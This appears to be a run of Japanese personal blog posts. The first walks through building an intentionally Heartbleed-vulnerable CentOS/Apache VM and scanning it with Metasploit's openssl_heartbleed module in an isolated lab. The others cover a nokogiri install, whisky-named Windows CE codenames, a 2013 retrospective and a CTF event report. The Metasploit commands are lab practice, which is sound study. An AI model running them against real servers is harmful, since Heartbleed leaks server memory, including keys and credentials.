CentOS6.5+VirtualBoxでHeartbleedなサーバを建ててMetasploitで突っついて遊ぶお話
表題の通りやってみたのでメモ書きとして残しておく。
サーバ構築はほぼ初めてなので色々誤謬があると思いますので話半分でお願いします。
どうやら世間ではVagrantなるものが流行っとるそうですがそんなもの使わず俺はゴリゴリ行くぜー…
1. CentOSのインストール
CentOS6.5 x86_64 minimalをDownload - CentOS Wikiの適当なミラーサーバからDL。僕は関西に住んでるので地理的に近そうなNAISTのhttp://ftp.nara.wide.ad.jp/からDLした。
VirtualBoxでRedHatの64bitで適当な名前の仮想マシンを作る。上記のCentOSのISOイメージを設定からマウントさせて起動する。
途中の設定の注意点はキーボード設定をjp106
、タイムゾーンをAsia/Tokyo
にするのを忘れずに。
後、rootのパスワードは忘れないように。他の設定は適当でもいい。
光学メディア経由で無くハードディスクからハードディスクなので数分と短めの時間で終わった。
2. CentOSの設定
root:さっきのrootパスワード
でrootで入れる。
2.1 ネットワークアダプタ周り
まず、ネットワーク設定をする。デフォルトのままだとアダプタ1がNATになってるので、それは各種インストールが終わるまでそのまま。
ただ、このままだとVirtualBoxのホストOSとの通信が出来ないので、アダプタ2をホストオンリーアダプタにする。その際下に出るMACアドレスを忘れずにメモする。ここではca:fe:ba:be:de:ad:be:af
とでもしておく。
まず、アダプタ1(NAT)に当たっている/etc/sysconfig/network-scripts/ifcfg-eth0
をvi
などで少し書き換える。ONBOOT=yes
にしておくと起動時にonになるので便利。ただしこれはどっちみち後でnoに戻すので毎回# ifup eth0
などで凌いでもいい。
次にアダプタ2(ホストオンリーアダプタ)に当たる/etc/sysconfig/network-scripts/ifcfg-eth1
を作る。上記のifcfg-eth0
をcp
すると楽。内容は以下の様な感じに。IPADDR
はコリジョンしない程度に好きなアドレスに。ca:fe:ba:be:de:ad:be:af
は上記でメモしたMACアドレスに。
なお、本当はこっちもDHCPで割り振りたかったけどそれだとエラーが出たので固定にしている。 また、固定の方がMetasploitなどから指定するときに楽といえば楽。
DEVICE=eth1 HWADDR=ca:fe:ba:be:de:ad:be:af TYPE=Ethernet ONBOOT=yes NM_CONTROLLED=yes BOOTPROTO=static IPADDR=192.168.56.xxx NETMASK=255.255.255.0 NETWORK=192.168.56.0
そして# service network restart
で設定再読み込みかCentOS自体を再起動。これでCentOSからはインターネットへはNATで、VirtualBoxのホストOSへはホストオンリーアダプタでpingが通るはず。また、ホストOSからもCentOSへpingが通るはず。
参考:
2.2 iptables周り
ただし、iptables(ファイアーウォール的なもの)の関係上このままだとApacheを建ててもiptablesで弾かれてアクセス出来ない。
ので、vi /etc/sysconfig/iptables
を書き換えてHTTP(80)、HTTPS(443)を通す。
外部に公開するサーバならSSHの22番を10022番とか違う値に変えたほうがアタックされにくくなっていいのかもしれないけど、今回は実験用で最終的には内部のみで使う予定なのでそのまま。
なお、ファイルの書き換えは元からある-A INPUT -m state --state NEW -m tcp -p tcp --dport 22 -j ACCEPT
の行をyy
でヤンクしてp
asteするのが早い。
# Firewall configuration written by system-config-firewall # Manual customization of this file is not recommended. *filter :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [0:0] -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT -A INPUT -p icmp -j ACCEPT -A INPUT -i lo -j ACCEPT # SSH, HTTP, HTTPS -A INPUT -m state --state NEW -m tcp -p tcp --dport 22 -j ACCEPT -A INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT -A INPUT -m state --state NEW -m tcp -p tcp --dport 443 -j ACCEPT -A INPUT -j REJECT --reject-with icmp-host-prohibited -A FORWARD -j REJECT --reject-with icmp-host-prohibited COMMIT
これで# service iptables restart
かCentOS再起動でネットワーク周りはOKなはず。
なお、上記の設定が面倒ならいっそ内部向けと割りきってiptablesを無効にしても良いのかも。
参考:
iptables (ファイアーウォール)の設定 〜 CentOS6 | EasyRamble
3. Apache HTTPdのインストール
ネットワーク周りを上記にまとめたら必然的にこんな場所になったけど、もっと先、例えばNATが有効になった時点で行っても良い。
# yum install -y httpd mod_ssl
そして取り敢えず起動するついでに自動起動をオンにする。
# chkconfig httpd on # service httpd start
取り敢えずホストOSからでもhttp://192.168.56.xxx/とかにアクセスしてみると良い。エラー画面が出たら多分どっかで失敗してるのでトラブルシューティング頑張れ♥頑張れ♥(伊東ライフ先生)
なお、OpenSSLについてはCentOSは元からインストール済みで、6.5の場合ちょうどHeartbleedに脆弱なバージョンだったのでここでは再インストールはしていない。けど多分だけどyumでバージョン指定インストール出来たはず。OpenSSLのバージョンはopenssl version
で確認可能。
Haertbleedに脆弱なOpenSSLのバージョンについては、
以下のバージョンが本脆弱性の影響を受けます。
OpenSSL 1.0.1 から 1.0.1f
OpenSSL 1.0.2-beta から 1.0.2-beta1
つまり0.9.x系とかは脆弱ではないので敢えて脆弱なマシンを作る場合注意? 例えばMetasploitable2なんかは0.9.x系統。
4. HTTPSの設定
OpenSSLで鍵とオレオレ証明証を作る。仮に証明証を格納する場所を/etc/httpd/ssl
とすると
# mkdir /etc/httpd/ssl # cd /etc/httpd/ssl
オレオレ証明書をopensslで作る(詳細版) - ろば電子が詰まっているを参考に
# openssl genrsa 2048 > server.key # openssl req -new -key server.key > server.csr # openssl x509 -days 3650 -req -signkey server.key < server.csr > server.crt # rm server.csr
途中の各項目はオレオレ証明証だし適当でいいと思う。
/etc/httpd/conf.d/ssl.conf
のこの2つの項目を書き換え
SSLCertificateFile /etc/httpd/ssl/server.crt SSLCertificateKeyFile /etc/httpd/ssl/server.key
# service httpd restart
でApacheを再起動してhttps://192.168.56.xxx/にアクセス。証明証の警告は無視して繋いでみる。Firefoxだとどうしても行かせようとしてくれないのでChromeとかで試した方がいい。Apacheのページが出ればOK。
5. Metasploitでexploit
Detecting OpenSSL-Heartbleed with Nmap & Exploiting with Metasploit | CYBER ARMS - Computer Securityを参考に。
$ /path/to/msfconsole バナーがどーん msf > search heartbleed [!] Database not connected or cache not built, using slow search Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/scanner/ssl/openssl_heartbleed 2014-04-07 normal OpenSSL Heartbeat (Heartbleed) Information Leak auxiliary/server/openssl_heartbeat_client_memory 2014-04-07 normal OpenSSL Heartbeat (Heartbleed) Client Memory Exposure msf > use auxiliary/scanner/ssl/openssl_heartbleed msf auxiliary(openssl_heartbleed) > set RHOSTS 192.168.56.xxx RHOSTS => 192.168.56.xxx msf auxiliary(openssl_heartbleed) > set VERBOSE true VERBOSE => true msf auxiliary(openssl_heartbleed) > run 色々出て楽しい!!✌('ω'✌ )三✌('ω')✌三( ✌'ω')✌
その他
- Nmapは反応が重いので取り敢えず確認なら
$ nmap -p80,443,22,53,123 192.168.56.xxx
みたいにポート指定でするといいと思う。 - インストールが無事終わったら脆弱性を抱えたマシンをインターネットへつなぐのは色々ダメなので
/etc/sysconfig/network-scripts/ifcfg-eth0
のONBOOT
をno
に戻してNAT接続をなるべくしないようにしましょう。というかVirtualBoxの設定からNATインターフェイスを無効にすべきか
追記:
Vagrantだとこんなのあるそうですよ→diracdeltas/heartbox
Sets up a basic Freebsd 10.0 VirtualBox running Apache 2.4 and OpenSSL 1.0.1e-freebsd for playing with heartbleed exploits.
OS X Mavericksへのnokogiriインストールで悩んだ話
途中経過を大分忘れているので要点だけ書く。 Web上に色々記事は有ったけど結局やり方がバラバラだったりでうまく行かなかったので 取り敢えずメモ代わりに。
インストールするnokogiriのバージョンは1.6.2.1っぽい。
どんなエラーメッセージで悩んでたか
基本的にはextconf.rbがどうだのというメッセージが出てた気がする。
新しいCommand Line Developer Toolsをインストール
最近Mountain LionからMavericksに上げて、それからも普通にgcc
やmake
が使えてたので大丈夫かと思ってたんだけど
nokogiriのインストールには新しいバージョンのCommand Line Developer Toolsが要るらしい。
Xcodeを立ち上げてみるとなんかAdditionalな何かをインストールする的なこと言われたのでそれをインストールして、以前と同じようにCommand Line Toolsのアップデートを試みるも Command Line Developer Toolsのインストール方法が変わってるので 以下を参考にCommand Line Developer Toolsをインストール。
Mavericks で Xcode から Command Line Developer Tools をインストールする - kakakakakku blog
$ xcode-select --install
GUIウィンドウが立ち上がるので指示にしたがって茶でもすすりながら待つ。
nokogiriをインストール
Web上の文献によるとbrew
とかで外部ライブラリのインストールが色々必要らしいが、
最近のバージョンのnokgoiriは自動で適したバージョンのを一緒にインストールするらしい。
ただ、何のオプションも付けずにgem install nokogiri
すると作業は進んでるっぽいんだけど
何も言わずに黙々と進めたりするので下のようなコマンドでgemをインストール。
$ gem install nokogiri --verbose
途中に以下のメッセージが出るが
IMPORTANT! Nokogiri builds and uses a packaged version of libxml2.
If this is a concern for you and you want to use the system library instead, abort this installation process and reinstall nokogiri as follows:
gem install nokogiri -- --use-system-libraries
If you are using Bundler, tell it to use the option:
bundle config build.nokogiri --use-system-libraries bundle install
However, note that nokogiri does not necessarily support all versions of libxml2.
For example, libxml2-2.9.0 and higher are currently known to be broken and thus unsupported by nokogiri, due to compatibility problems and XPath optimization bugs.
If this is a concern for you and you want to use the system library instead,
とのことなので今回はnokogiriに含まれるバージョンのを使うので無視。
多分これで行けるはず。
オマケ
なんでnokogiriが必要だったかというとburtlo/paradeを試したかったからなんだけど、このインストールでもnokogiri以外にもlibffiか何かのインストールで同様のエラーが出たけどCommand Line Developer Toolsをインストールした後はエラー吐かなかったのでRubyでNative Extension周りでトラブってる人は取り敢えずCommand Line Developer Toolsを見直すと良い。
Windows CEとウィスキーのお話
僕はお酒は主に蒸留酒・洋酒の類、特にウィスキーをよく飲むのですが、そんな中今日知ったことがあるので。
今はWindows Phone OSとかになってるけど昔昔MicrosoftはWindows CEというモバイル機器向けOSを出していたそうな。 そのコードネームが4.0〜6.0ではシングルモルトウイスキーのブランド名になってるらしい。
Windows CE v.s. Windows Mobile and other - 高橋 忍のブログ - Site Home - MSDN Blogs
バージョン | コードネーム | 由来 |
---|---|---|
4.0 | Talisker | タリスカー(http://www.mhdkk.com/luxury/talisker.html) |
4.1 | Jameson | ジェイムソン(Jameson Irish Whiskey - Wikipedia, the free encyclopedia) |
4.2 | McKendric | マッケンドリック |
5.0 | Macallan | マッカラン(ザ・マッカラン サントリーウイスキー) |
5.01 | Bowmore | ボウモア(ボウモア ウイスキー サントリー) |
6.0 | Yamazaki | 山崎(シングルモルトウイスキー山崎 サントリー) |
特に山崎は一度10年のものを飲んだことが有り、ちょうど家に新・山崎が置いてあるところです。 美味しかったです。
ちなみに今日はバランタインファイネストがあったのでそれ飲んでました。最近ロックグラスを入手したのでよくロックで飲んでます。
はてなダイアリーからはてなブログへ移行した
お久しぶりです。 上記の通りはてなダイアリーからはてなブログへ移行しました。
ついでにタイトルも前の「ほとんど欄外」からSQL Injectionチックなタイトルに変えてみました。
これを機にもう少し更新回数を増やせれば…
ついでに色々テスト
- 箇条書きLv1
- Lv2
- LV1
引用
puts "codeサンプル"
— 死んだ牛肉 (@tasuten) 2014, 6月 21
SSHのポート番号の覚え方考えた
SSH→22Hで22番。どやっ
2013年振り返り
去年もやったので今年も軽く。
Google Calendarの過去の予定を見つつ振り返ってみる。
文章はすごくアレいというか小並感ですが。
年初は多分普通に年明けしてたっぽい。
年明けの後の予定としては1/13にインテックス大阪であったオールジャンル同人誌即売会Comic Treasure21に参加してたっぽい。
Twilogとか見てるとなかなか楽しんでたよう。行けない冬コミの代わりという面もある。
で、その翌日成人式に参加してきた。正確には3月が誕生日なので当時19歳だったんだけど最近の成人式は学年度区切りっぽい?
そこで数年ぶりに中学時代の友人にも会った。ぱっと見見た目が変化してたやつも居たけど中身は昔通りって感じで安心した。
その後は普通に秋セメスターの試験期間突入してその後は冬休み。
3/2の誕生日で20歳に。ついに成人しました。酒が飲める。
冬休み中は例えば部活のハッカソン的なものにも参加した。そこではちょうど学業の方で使ってたということでJavaでソケット使って簡単なHTTPサーバ作った。事前に設計を割と決めてたお陰でハッカソンなのに苦戦している部員を他所に早々に寝てやりました。
ちなみにソースコードは以下のレポジトリで。
tasuten/tiny-http-server · GitHub
他には部活の送別会などもあったり。
で、ボロクソの成績で絶望しつつ年度明けて3回生へ。休みまくったし仕方ないね。じゃあ今学期もやばいね!
4月はIPAの情報セキュリティスペシャリストを受けた。6月に合否判定。合格。やったぜ。
5月。大きなイベントは無し。敢えて挙げるならこの頃から学内では就職ガイダンスとか始まってたので参加しつつ。
あと、この頃からOSC京都のオフラインミーティングがあったりそれに参加したり。
6月。研究室配属のための研究室訪問の時期。持病が悪化するわ風邪引くわでほとんど行けず。だが研究室は第一希望のところに決まったのでよしとする。そんな中同人誌即売会Comic Communication17行ってその帰りに心斎橋のまんだらけと大阪日本橋寄ってる。バカだ。
月末はアカリクITインターンシップセミナー in 大阪に行く。僕にとっては初就活系イベント。インターンセミナーと言っても企業紹介とかもあって就職について考えるきっかけになった。あと、ノベルティ貰った。
7月。月初はまずさくらインターネットのイベントが京都であったので行った。(http://knowledge.sakura.ad.jp/event/533/)
この頃から就職はネットワークエンジニアになりたいと考え始めてたので、実際運用ではどういう問題が起きたりするのか等聞けて非常に良かった。ちなみに会場はホテルのホールで高級感凄まじかった。あと、さくらのクラウドのクーポン貰った。
他には人生初の投票となる第23回参議院議員通常選挙での投票。記念として投票済証も貰った。決して夏コミで持って行くとサークルさんによっては何かもらえるとか言う噂に載せられたわけではないんだからね!
月末から試験期間。
8月。夏の方は以下にもまとめてるので軽めに。
2013年の夏期休暇振り返り - ほとんど欄外
試験期間中だったけどOSC京都2013に学生スタッフとして参加。当日は女子大生に囲まれてArduinoとか7セグLEDとか触ってました。あと、最後のLTでも話しました。Eject帽を被らさせつつ。
その後夏季休暇へ。
夏コミの為東京まで行く。コミケ雲+蒸し暑さで死にかけた。アキバにも行った。
他には研究室の新歓合宿的なものにも参加して琵琶湖で泳いでBBQ。
前述の部活のハッカソン的なものの第2回目にも参加。今度はProcessingでライフゲームをつくる。同じく早々にスヤァ。
tasuten/processing-lifegame · GitHub
9月。部活の合宿で飛騨高山行ってまたBBQ。1日目の夜飲みすぎて2日目寝潰す。帰りに大須にも行く。
またも部活関連で今年も関西情報系学生団体交流会(KC3)に参加。当日はセキュスペ取ったということでセキュリティに関するセミナー的なものをやったり。反省点としてはほとんど僕が前で話す形にしてしまったので今度やるときはもう少し参加型の、例えばセキュリティで言えばCTF的な感じにしたほうがいいかもとか考えたり。
ちなみにその時使った資料は以下に。
tasuten/kc3-2013 · GitHub
あ、3回生春の成績は奇跡のV字回復してました。GPAが2回生秋セメスターの約2倍という頭オカシイ感じに。
そして艦これを始める。
そして夏季休暇は終わり3回生秋セメスターに。研究室での研究始まる。
10月。13日。東方紅楼夢へ行く。オンリーなのにオールジャンルのComiTreやComiComiよりも規模デカくて度肝を抜かれる。東方やばい。すごい。
16日。IPv6サミットin京都聞きに行く。丁度去年辺りIPv4グローバルアドレスが枯渇してIPv6がホットな時期ということで濃密な話が聞けた。
20日。IPAの今度はネットワークスペシャリスト試験受ける。12月の合否判定でギリギリ合格。セキュスペと合わせてv(´∀`*v)ダブルピース
25日。Matzことまつもとゆきひろさんが京都コンピュータ学院で講演されるということで聞きに行く。学生向けということで技術的な話というより未来やキャリアに関する話。最後の質疑応答でMatzもClojureが気になっているという話がちらりと聞けてよかった。
11月。学祭の季節。今年は自分の大学の部展のシフト入ったり。僕は前述のハッカソンで作ったライフゲーム展示しました。案外好評でした。
うちの大学のお隣さんの京都精華大学の学祭の特に自主制作物即売会KINOFAIRに行ったり。
いわゆる同人イベントとは若干似てるけど空気感は割と違うくていい感じのイラストのポストカードやアクセサリーなどのオリジナルグッズを出してらっしゃる方が多かったり。まったりとした空気で良かったです。
8日9日は関西オープンフォーラム(KOF)へ。高木浩光先生の話やujihisaさんのClojure話、さくらインターネットの田中社長の話などが特に記憶に残っています。
17日は関西のオールジャンル同人イベントのComic Communicationが今回でお終いになってしまうと聞いて京都みやこめっせまで行く。艦これ本一杯買った。ComiComi関係者の皆様お疲れ様でした。関西のオールジャンルイベントといえばComiTreかComiComiというイメージがあったので残念ではありますが、皆様がこれまで関西の同人界を支えた功労は非常に大きかったと思います。また、今後皆様の意思を継ぐ方もきっと出てくると思います。ただの読み専で直近2回しか参加してないのに偉そうなこと言ってしまいましたが、ありがとうございました。
19日。GitHub トレーニングチームから学ぶ Git の内部構造 @京都 : ATNDを聞きに行く。内容はGitHubのエンジニアによる(GitHubではなく)gitの内部の解説。話の内容は僕の足りぬ頭ではあまり追えてないが分からないなりにも分かったことがいくつかあって非常に良かった。あと、GitHubのステッカー貰った。
月末はうちの研究室ともう一つ懇意にしている研究室との合同進捗会+飲み会。ここでジントニックを飲みジンにハマり今タンカレーが家にある。
12月。一番大きかったのはmixi Scrap Challenge #mixi_scrap に参加してきたことだと思う。これはmixi社が主催しているクラッキングイベントなんだけど、自分はセキュスペ持ってて体系的な知識はあるかもしれないけど実際の攻撃手法などの経験・技術が不足していることを痛感した。けどすごく楽しかった。
カプセルホテルに泊まって翌日ついでというかこっちメインということでアキバを1日観光。色々買った。アキバのジャンク街に初めて行ったがマニアックなものがゴロゴロ転がっててやばかった。ジャンク街ではSunのUNIX用キーボードとか買った。あと、とらのあなの規模がやばかった。ビル2本(A・B店)+向かいの建物の地下フロアまるごと(C店)とは…。ちなみに買ったものの写真はこちら。
ジャンク街→https://twitter.com/tasuten/status/412257957460451329
マンガ/同人系(18禁含む)→https://twitter.com/tasuten/status/412281190012317696
他にはICPCの国内予選を突破した学内のチームがICPCの勉強会を開くということでそれに行ったり。
そして研究室の忘年会に行ったり。で、29日(つまりこれを書いてる数時間前)に軽く部屋の掃除と艦これイベント攻略を進めつつ今に至る。
1年間をざっと振り返ってまとめると、まず成人したということがある。あんまりその実感は無いけれど。それと、各種IT系イベント+高度試験のそれぞれでのスキルアップが確実に測れたというのを感じた。あと、今年もやっぱり同人系イベントいっぱい行きました。
僕ら15新卒は今月から就活が始まったそうですが、なんも出来てないので来年は頑張ります…。あと、研究の方も…。
その合間を縫ってでも今年みたく各種IT系イベント・同人イベント行ければ…。艦これも。
我が鎮守府では最近ようやく響がВерныйに、北上大井両名が改二になりました。
という訳で皆様良いお年を。
mixi Scrap Challenge #mixi_scrap に参加してきた
表題の通り、去る2013年12月14日のmixi社主催のWeb系クラッキングイベントのmixi Scrap Challengeに参加してきました。その感想文です。文章力はまるでないのでまるで小学生の感想文です。
Scrap Challenge 2013 | 株式会社ミクシィ 学生向けエンジニアイベント
ちなみにこのレポートの草案はScrap Challengeの後秋葉原のカプセルホテルに泊まってそのまま丸一日秋葉原観光した後の帰りの新幹線の中で書いてます。結構揺れます。ゑびすびーるうまい!
まずはmixiさん、交通費半分と懇親会も含めてありがとうございます!くすねたアサヒスーパードゥライ風呂あがりに飲みましたがめっちゃ美味かったです!
(新幹線、WiFi飛んでるけどプロバイダとの契約必要なタイプのだしつらい)
なお、直後にmixiの方がまとめられたTogetterがありますのでそちらの方もどうぞー→Scrap Challenge 2013.12 - Togetterまとめ
まず、形式としては上記リンクの募集要項にもあるように、mixiっぽいけどあえて脆弱性を含ませた偽mixiにチームでアタックして出てきた問題を解いてポイントを稼ぐっていう結構ベーシックな感じです。
アタックの前にmixi社のエンジニアの方のセミナーがありました。
そこではmixiがセキュリティとどう関わってるのかなどを聴きました。例えば社内ではどんな体制を組んでいるのか、他には脆弱性報奨金制度の話題とか(mixiとセキュリティといえばですが)ぼくはまちちゃん事件の話なんかもありました。
実際に企業の中でどんな体制が取られているのかを直に聴くことなんてなかったので非常に興味深かったです。
その後お昼ごはんを挟んで実際に問題を解く感じです。
問題内容については「秘密でお願いします♥」と念を押されましたので詳しくは言えませんが、全体としては、Web関連の脆弱性といえば、って感じのチョイスではありました。徳丸本とか読んでるといいかも。
参加してみての感想ですが、僕がこれに参加した理由としては「セキュスペ持ってるけど知識だけで実際に攻撃手法を用いてやってみたことないし、そっち方面知りたい・やってみたい」というモチベーションでした。実際参加してみて、確かに自分の経験不足を痛感しました。例えば僕は参加する直前に所謂徳丸本をざっと読んでたのですが、読んだだけで知識としては知ったつもりかもしれないけど経験・技術にはなってないなと痛感しました。同時に、解けた時はすごくうれしくて、いわゆるハッキング(悪意を含むものも含まないものも)の楽しさってこういうことなのかなとも思いました。
あと、面白かったのが参加者の結構な割合が関西勢だったので知人が数名おり、かつ同じチームのメンバーが全員(Twitter上で)知ってる人という面白いことになってて「世間案外狭いなぁ」と思いました。
以上、簡単な文章になってしまいましたが、mixiさん、同チームのメンバーを含めた参加者の皆さん、ありがとうございました!すごく疲れましたがすごく楽しかったです!
特にmixiさん、今回のような貴重な場を設けていただきありがとうございます。こういうクラッキング系のものは同意なしに相手にやると不正アクセス禁止法などに引っかかり、かと言って自分で環境作るとなんとなく脆弱性が分かってしまうというジレンマがあり、本当に難しいものだと思います。ですので、今回のようにmixiさんに環境を用意して頂くというのは非常に嬉しいことです。
最後になりましたが他の方のエントリなんかは「#mixi_scrap」や「Scrap Challenge」などでTwitterなど検索すると見つかるかもです。
あと、今年度は年明けにもあるそうなのでScrap Challenge 2013 | 株式会社ミクシィ 学生向けエンジニアイベントなどをぜひ。
アキバもすげー楽しかったです!同人誌一杯買った!